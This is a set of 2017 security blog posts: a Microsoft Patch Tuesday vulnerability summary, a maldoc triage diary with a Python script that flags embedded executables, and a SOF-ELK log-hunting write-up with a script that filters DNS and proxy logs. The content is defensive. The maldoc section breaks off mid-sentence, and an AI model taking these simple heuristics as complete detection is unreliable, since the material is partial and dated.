According to the Microsoft advisories, most of the vulnerabilities were privately disclosed and there is no exploit available [yet] for the most critical ones. In either case, make sure to proceed with the updates: the recent WannaCry and NotPetya outbreaks taught us that leaving critical vulnerabilities unpatched in enterprise Microsoft environments is not a healthy policy, especially when they may allow lateral movement.

I've summarized the flaws that I consider most important in the list below with the associated CVE, CVSS base score and advisory URLs. Before I forget, besides the Microsoft vulnerabilities, there is an important Flash Player update [2].

CVE-2017-8590 | Windows CLFS Elevation of Privilege Vulnerability

An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory.

In a local attack scenario, an attacker could exploit this vulnerability by running a specially crafted application to take control of the affected system. An attacker who successfully exploited this vulnerability could run processes in an elevated context.

The update addresses the vulnerability by correcting how CLFS handles objects in memory.

Note: The Common Log File System (CLFS) is a high-performance, general-purpose log file subsystem that dedicated client applications can use and multiple clients can share to optimize log access.

CVSS base: 8.8
CVE: CVE-2017-8590
Advisory: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8590

CVE-2017-8589 | Windows Search Remote Code Execution Vulnerability

A remote code execution vulnerability exists in the way Windows Search handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system: install programs; view, change, or delete data; or create new accounts with full user rights.

To exploit the vulnerability, the attacker could send specially crafted messages to the Windows Search service. An attacker with access to a target computer could exploit this vulnerability to elevate privileges and take control of the computer. Additionally, in an enterprise scenario, a remote unauthenticated attacker could remotely trigger the vulnerability through an SMB connection and then take control of a target computer.

The security update addresses the vulnerability by correcting how Windows Search handles objects in memory.

CVSS base: 8.1
CVE: CVE-2017-8589
Advisory: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8589

--

CVE-2017-8563 | Windows Elevation of Privilege Vulnerability

An elevation of privilege vulnerability exists in Microsoft Windows when Kerberos falls back to NT LAN Manager (NTLM) Authentication Protocol as the default authentication protocol.

In a remote attack scenario, an attacker could exploit this vulnerability by running a specially crafted application to send malicious traffic to a domain controller. An attacker who successfully exploited this vulnerability could run processes in an elevated context.

The update addresses this vulnerability by incorporating enhancements to authentication protocols designed to mitigate authentication attacks. It revolves around the concept of channel binding information.

CVE: CVE-2017-8563
CVSS base: 7.5
Advisory: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8563

CVE-2017-8565 | Windows PowerShell Remote Code Execution Vulnerability

A remote code execution vulnerability exists in PowerShell when PSObject wraps a CIM Instance. An attacker who successfully exploited this vulnerability could execute malicious code on a vulnerable system.

In an attack scenario, an attacker could execute malicious code in a PowerShell remote session.

The update addresses the vulnerability by correcting how PowerShell deserializes user supplied scripts.

CVE: CVE-2017-8565
CVSS base: 7.5
Advisory: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8565

CVE-2017-8495 | Kerberos SNAME Security Feature Bypass Vulnerability

A security feature bypass vulnerability exists in Microsoft Windows when Kerberos fails to prevent tampering with the SNAME field during ticket exchange. An attacker who successfully exploited this vulnerability could use it to bypass Extended Protection for Authentication.

To exploit this vulnerability, an attacker would have to be able to launch a man-in-the-middle (MiTM) attack against the traffic passing between a client and the server.

The update addresses this vulnerability by adding integrity protection to the SNAME field.

CVE: CVE-2017-8495
CVSS base: 7.5
Advisory: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8495

CVE-2017-8588 | WordPad Remote Code Execution Vulnerability

A remote code execution vulnerability exists in the way that Microsoft WordPad parses specially crafted files.

Exploitation of this vulnerability requires that a user open a specially crafted file with an affected version of Microsoft WordPad. In an email attack scenario, an attacker could exploit the vulnerability by sending a specially crafted file to the user and then convincing the user to open the file.

The update addresses the vulnerability by correcting the way that Microsoft WordPad parses specially crafted files, and by enabling API functionality in Windows that Microsoft WordPad will leverage to resolve the identified issue.

CVE: CVE-2017-8588
CVSS base: 6.7
Advisory: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8588

CVE-2017-8463 | Windows Explorer Remote Code Execution Vulnerability

A remote code execution vulnerability exists when Windows Explorer improperly handles executable files and shares during rename operations. An attacker who successfully exploited this vulnerability could run arbitrary code in the context of another user. Users not running as administrators would be less affected.

To exploit this vulnerability, an attacker would first share both a folder and malware named with an executable extension, and then trick the user into thinking that the malware was the folder. The attacker could not force the user to open or browse the share but could use email or instant messages to trick them into doing so.

The update addresses the vulnerability by correcting how Windows Explorer handles executable files and shares during rename operations.

CVE: CVE-2017-8463
CVSS base: 6.3
Advisory: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8463

ADV170009 | July Flash Security Update

This security update addresses the following vulnerabilities, which are described in Adobe Security Bulletin APSB17-21: CVE-2017-3099, CVE-2017-3080, CVE-2017-3100

Severity: Critical

Advisory: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV170009

--
Renato Marinho
Morphus Labs | LinkedIn |Twitter


ISC Stormcast For Wednesday, July 12th 2017 https://isc.sans.edu/podcastdetail.html?id=5578, (Tue, Jul 11th)

SANS Internet Storm Center - July 11, 2017 - 10:05pm

Basic Office maldoc analysis, (Mon, Jul 10th)

SANS Internet Storm Center - July 10, 2017 - 11:21pm

Malicious Office documents come in all types of flavors, sometimes very simple: they contain just an embedded file (for example an EXE), without any script or exploit to automatically launch the embedded file. The user is persuaded through social engineering to extract and execute the embedded file.

Analyzing such files in a sandbox will often not reveal the malicious payload, as the sandbox engine needs to recognize and open the embedded file.

Static analysis is simple, however. Let

If you want to practice this type of analysis, it's easy to create your own samples: with Word, use command: Insert / Object / Object / Create from file ...

Inserting an object like this can result in other types of documents, which I will cover in an upcoming diary.
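The static triage of the embedded-file case described above, as an added example that is not code from this diary: the script opens an OOXML document (.docx/.xlsx/.pptx) as a zip, lists every part under an embeddings/ folder, and flags any part carrying a PE image (an MZ header whose e_lfanew points at a PE signature). The sample document and the fake executable are constructed inline; binary .doc files, which store the object in the OLE container itself, are not covered.

```python
import io
import struct
import zipfile

def build_fake_pe() -> bytes:
    """Constructed stand-in for an embedded EXE: a DOS header whose e_lfanew
    points at a PE\\0\\0 signature. Not a runnable binary."""
    dos = bytearray(b"MZ" + b"\x00" * 62)       # 64-byte IMAGE_DOS_HEADER
    struct.pack_into("<I", dos, 0x3C, 0x80)     # e_lfanew -> PE header at 0x80
    return bytes(dos) + b"\x00" * (0x80 - 64) + b"PE\x00\x00" + b"\x00" * 20

def find_pe_images(blob: bytes):
    """Offsets of plausible PE images anywhere in blob: an 'MZ' whose
    e_lfanew (dword at +0x3C) lands on a 'PE\\0\\0' signature."""
    hits = []
    pos = blob.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(blob):
            e_lfanew = struct.unpack_from("<I", blob, pos + 0x3C)[0]
            pe = pos + e_lfanew
            # heuristic bound: real e_lfanew values are small positive offsets
            if 0x40 <= e_lfanew < 0x1000 and blob[pe:pe + 4] == b"PE\x00\x00":
                hits.append(pos)
        pos = blob.find(b"MZ", pos + 1)
    return hits

def triage_ooxml(data: bytes):
    """Static triage: scan every embedded-object part (word/, xl/ or ppt/
    embeddings/) and report PE images found inside. Returns {part: [offsets]}."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if "/embeddings/" in name:
                findings[name] = find_pe_images(z.read(name))
    return findings

def build_sample_docx() -> bytes:
    """Constructed .docx: one embedding wrapping the fake EXE, one benign."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        # 0x200 filler bytes stand in for the OLE container that Word puts
        # around the Ole10Native stream holding the inserted file
        z.writestr("word/embeddings/oleObject1.bin", b"\x00" * 0x200 + build_fake_pe())
        z.writestr("word/embeddings/oleObject2.bin", b"\x00" * 0x100)
    return buf.getvalue()

if __name__ == "__main__":
    for part, offsets in triage_ooxml(build_sample_docx()).items():
        print(part, "PE image at" if offsets else "no PE image", offsets)
```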

Didier Stevens
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com


ISC Stormcast For Tuesday, July 11th 2017 https://isc.sans.edu/podcastdetail.html?id=5576, (Mon, Jul 10th)

SANS Internet Storm Center - July 10, 2017 - 10:00pm

ISC Stormcast For Monday, July 10th 2017 https://isc.sans.edu/podcastdetail.html?id=5574, (Sun, Jul 9th)

SANS Internet Storm Center - July 9, 2017 - 9:40pm

Adversary hunting with SOF-ELK, (Sun, Jul 9th)

SANS Internet Storm Center - July 9, 2017 - 6:51am

As we recently celebrated Independence Day in the U.S., I'm reminded that we honor what was, of course, an armed conflict. Today's realities, when we think about conflict, are quite different than the days of lining troops up across the field from each other, loading muskets, and flinging balls of lead into the fray.
We live in a world of asymmetrical battles, often conflicts that aren't always obvious in purpose and intent, and likely fought on multiple fronts. For one of the best reads on the topic, take the well spent time to read TJ O'Connor's The Jester Dynamic: A Lesson in Asymmetric Unmanaged Cyber Warfare. If you're reading this post, it's possible that your front is that of 1s and 0s, either as a blue team defender, or as a red team attacker. I live in this world every day of my life as a blue teamer at Microsoft, and as a joint forces cyber network operator. We are faced, each day, with overwhelming, excessive amounts of data, of varying quality, where the answers to questions are likely hidden, but available to those who can dig deeply enough.
New platforms continue to emerge to help us in this cause. At Microsoft we have a variety of platforms that make the process easier for us, but no less arduous, to dig through the data, and the commercial sector continues to expand its offerings. For those with limited budgets and resources, but a strong drive for discovery, there have been outstanding offerings as well. Security Onion has been at the forefront for years, and is under constant development and improvement in the care of Doug Burks.
Another emerging platform, to be discussed here, is SOF-ELK, part of the SANS Forensics community, created by SANS FOR572, Advanced Network Forensics and Analysis author and instructor Phil Hagen. Count SOF-ELK in the NFAT family for sure, a strong player in the Network Forensic Analysis Tool category.
SOF-ELK has a great README, don't be that person, read it. It's everything you need to get started, in one place. What!? :-)
Better yet, you can download a fully realized VM with almost no configuration requirements, so you can hit the ground running. I ran my SOF-ELK instance with VMware Workstation 12 Pro with no issues other than needing to temporarily disable Device Guard and Credential Guard on Windows 10.
SOF-ELK offers some good test data to get you started with right out of the gate, in /home/elk_user/exercise_source_logs, including Syslog from a firewall, router, converted Windows events, a Squid proxy, and a server named muse. You can drop these on your SOF-ELK server in the /logstash/syslog/ ingestion point for syslog-formatted data. Additionally, utilize /logstash/nfarch/ for archived NetFlow output, /logstash/httpd/ for Apache logs, /logstash/passivedns/ for logs from the passivedns utility, /logstash/plaso/ for log2timeline, and /logstash/bro/ for, yeah, you guessed it.
I mixed things up a bit and added my own Apache logs for the month of May to /logstash/httpd/. The muse log set in the exercise offering also included a DNS log (named_log), for grins I threw that in /logstash/syslog/ as well just to see how it would play.
Run down a few data rabbit holes with me, I swear I can linger for hours on end once I latch on to something to chase. We'll begin with a couple of highlights from my Apache logs. The SOF-ELK VM comes with three pre-configured dashboards including Syslog, NetFlow, and HTTPD. You can learn more in the start page for the SOF-ELK UI, my instance is http://192.168.50.110:5601/app/kibana. There are three panels, or blocks, for each dashboard's details, at the bottom of the UI. I drilled through to the HTTPD Log Dashboard for this experiment, and immediately reset the time period for analysis (click the time marker in the upper right hand part of the UI). It defaults to the last 15 minutes, if you're reviewing older data it won't show until you adjust to match your time stamps. My data is from the month of May so I selected an absolute window from the beginning of May to its end. You can also select quick or relative time options, it
Figure 1: HTTPD Log Dashboard

Nice! An event count summary, source ASNs by count (you can immediately see where I scanned myself from work), a fantastic Access Source map, a records graph by HTTP verbs, and one by response codes.
The beauty of these SOF-ELK dashboards is that they're immediately interactive and allow you to drill right in to interesting data points. The holisticinfosec.org website is intentionally flat and includes no active PHP or dynamic content. As a result, my favorite response code as a web application security tester, the 500 error, is notably missing. But, in both the timeline graphs we note a big traffic spike on 8 MAY 2017, which correlates nicely with my above-mentioned scan from work, as noted in the ASN hit count, and seen here in Figure 2.
Figure 2: Traffic spike from scan

This visualizes well but isn't really all that interesting or uncommon, particularly given that I know I personally ran the scan, and scans from the Intarwebs are a dime a dozen. What did jump out for me though, as seen back in Figure 1, was the presence of four PUT requests. That's usually a bad thing where some @$$h@t is trying to drop something on my server. Let's drill in a bit, shall we? After clicking the graph line with the four PUT requests, I quickly learned that two requests came from 204.12.194.234 (AS32097: WholeSale Internet in Kansas City, MO) and two came from 119.23.233.9 (AS37963: Hangzhou Alibaba Advertising in Hangzhou, China). This is well represented in the HTTPD Access Source panel map (Figure 3).
Figure 3: Access Source

The PUT requests each included a txt file attempt, specifically dbhvf99151.txt and htjfx99555.txt; both were rejected, redirected (302), and sent to my landing page (200).
Research on the IPs found that 119.23.233.9 was on the real time suspected malware list as detected by InterServer's intrusion systems as seen 22 MAY, and 204.12.194.234 was found twice in the AbuseIPDB, flagged on 18 MAY 2017 for Cknife Webshell Detected. Now we're talking. It's common to attempt a remote file include attack or a PUT, with what is a web shell. I opened up SOF-ELK on that IP address and found eight total hits in my logs, all looking for common PHP opportunities with the likes of GET and POST for /plus/mytag_js.php,
Figure 4: Discovery

That's a groovy little hunting trip through HTTPD logs, but how about a bit of Syslog? I spotted a likely oddity that could be correlated across a number of the exercise logs, we'll see if the correlation is real. You'll notice tabs at the top of your SOF-ELK UI, we'll use Discover for this experiment. I started from the Syslog Dashboard with my time range set broadly on the last two months. 7606 records presented themselves, sliced neatly by hosts and programs, as seen in Figure 5.
Figure 5: Syslog Dashboard

Squid proxy logs showed the predominance of host entries (6778 or 57.95% of 11,696 to be specific), so I started there. Don't laugh, but I'll often do keyword queries just to see what comes up, sometimes you land a pointer to a good rabbit hole. Within the body of 6778 proxy events, I searched malware. Two hits came back for GET request via a JS redirector to bleepingcomputer.com for your basic how-to based on random websites opening in Chrome
Figure 6: Malware keyword

More importantly, we have an IP address to pivot on: 10.3.59.53. A search of that IP across the same 6778 Squid logs yielded 3896 entries specific to this IP, and lots to be curious about:

  • datingukrainewomen.com
  • anastasiadate.com
  • YouTube videos for hair loss
  • crowdscience.com for random pop-ups driving me nuts

Do I need to build this user profile out for you, or are you with me? Proxy logs tell us so much, and are deeply worthy of your blue team efforts to collect and review.
I jumped over to the named_log from the muse host to see what else might reveal itself. Here's where I jumped to Discover, the Splunk-like query functionality inherent to SOF-ELK (and ELK implementations). I did a reductive query to see what other oddities might surface: 10.3.59.53 AND dns_query: (*.co.uk OR *.de OR *.eu OR *.info OR *.cc OR *.online OR *.website). I used these TLDs based on the premise that bots using Domain Generation Algorithms (DGA) will often use these TLDs. See The DGA of PadCrypt to learn more, as well as ISC Diary handler John Bambanek's OSINT logic. The query results were quite satisfying, 29 hits, including a number of clearly randomly generated domains. Those that were most interesting all included the .cc TLD, so I zoomed in further. Down to five hits, as seen in Figure 7.
Figure 7: .CC TLD hits

Oh man, not good. I had a hunch now, and went back to the proxy logs with 10.3.59.53 AND squid_request:*.exe. And there you have it, ladies and gentlemen, hunch rewarded (Figure 8).
Figure 8: taxdocs.exe

If taxdocs.exe isn't malware, I'm a monkey's uncle. Unfortunately, I could find no online references to these .cc domains or the .exe sample or URL, but you get the point. Given that it's exercise data, Phil may have generated it to entice us to dig deeper.
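The two pivots above (the named_log query on DGA-prone TLDs for one client, then the proxy query for .exe fetches by the same client) run over plain log files, as an added example that is not part of the diary or of SOF-ELK. The BIND query-log and Squid native access-log lines are constructed for this example; the client address 10.3.59.53 and the TLD list are the ones the diary uses, and the domains and server addresses are made-up placeholders.

```python
import re
from collections import Counter

# Constructed sample lines (not the FOR572 exercise data): BIND query-log and
# Squid native access-log entries in the default formats those tools write.
NAMED_LOG = """\
10-May-2017 09:12:01.120 client 10.3.59.53#51234: query: www.example.com IN A + (10.3.59.1)
10-May-2017 09:12:07.551 client 10.3.59.53#51240: query: kq3vx7zj1p.cc IN A + (10.3.59.1)
10-May-2017 09:12:09.004 client 10.3.59.53#51241: query: m8dl0zqwe.cc IN A + (10.3.59.1)
10-May-2017 09:13:44.213 client 10.3.59.77#40211: query: www.example.co.uk IN A + (10.3.59.1)
10-May-2017 09:15:10.333 client 10.3.59.53#51266: query: zp0q1wv.info IN A + (10.3.59.1)
"""
SQUID_LOG = """\
1494407521.120    245 10.3.59.53 TCP_MISS/200 5321 GET http://www.example.com/ - HIER_DIRECT/192.0.2.10 text/html
1494407530.004   1890 10.3.59.53 TCP_MISS/200 204800 GET http://m8dl0zqwe.cc/taxdocs.exe - HIER_DIRECT/203.0.113.9 application/octet-stream
1494407631.552    120 10.3.59.77 TCP_MISS/200 8000 GET http://www.example.co.uk/setup.exe - HIER_DIRECT/198.51.100.7 application/octet-stream
1494407640.900     90 10.3.59.53 TCP_HIT/200 1200 GET http://crowdscience.com/ad.js - HIER_NONE/- application/javascript
"""

DNS_RE = re.compile(r"client (?P<client>[\d.]+)#\d+: query: (?P<qname>\S+) IN ")
SQUID_RE = re.compile(r"^\S+\s+\d+\s+(?P<client>[\d.]+)\s+\S+\s+\d+\s+(?P<method>\S+)\s+(?P<url>\S+)")
# TLDs from the diary's Discover query
DGA_TLDS = ("co.uk", "de", "eu", "info", "cc", "online", "website")

def tld_of(qname, tlds=DGA_TLDS):
    """Return the matching watch-list TLD for qname, or None."""
    q = qname.rstrip(".").lower()
    return next((t for t in tlds if q.endswith("." + t)), None)

def dns_queries_for(host, log, tlds=DGA_TLDS):
    """named_log side of the hunt: queries from `host` for the listed TLDs."""
    hits = []
    for line in log.splitlines():
        m = DNS_RE.search(line)
        if m and m["client"] == host and tld_of(m["qname"], tlds):
            hits.append(m["qname"].rstrip(".").lower())
    return hits

def tld_histogram(qnames):
    """Zoom-in step: count hits per TLD so the dominant one (.cc here) stands out."""
    return Counter(tld_of(q) for q in qnames)

def exe_requests_for(host, log):
    """Squid side of the hunt: URLs ending in .exe fetched by `host`."""
    urls = []
    for line in log.splitlines():
        m = SQUID_RE.match(line)
        if m and m["client"] == host and m["url"].lower().endswith(".exe"):
            urls.append(m["url"])
    return urls

if __name__ == "__main__":
    dga = dns_queries_for("10.3.59.53", NAMED_LOG)
    print("watch-list TLD queries:", dga, dict(tld_histogram(dga)))
    print(".exe downloads:", exe_requests_for("10.3.59.53", SQUID_LOG))
```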
When we think about the IOC patterns for Petya, a hunt like this is pretty revealing. Petya's initial infection appears to involve a software supply-chain threat involving the Ukrainian company M.E.Doc, which develops tax accounting software, MEDoc. This is not Petya (as far as I know) specifically but we see pattern similarities for sure, one can learn a great deal about the sheep and the wolves. Be the sheepdog!
Few tools are better in the free and open source arsenal to help you train and enhance your inner digital sheepdog than SOF-ELK. "I'm a sheepdog. I live to protect the flock and confront the wolf." ~LTC Dave Grossman, from On Combat.

Believe it or not, there's a ton more you can do with SOF-ELK, consider this a primer and a motivator.
I LOVE SOF-ELK. Phil, well done, thank you. Readers rejoice, this is really one of my favorites for toolsmith, hands down, out of the now 126 unique tools discussed over more than ten years. Download the VM, and get to work herding. :-)
Cheers...until next time.

Russ McRee | @holisticinfosec


©2001-2017 - Baanboard.com - Baanforums.com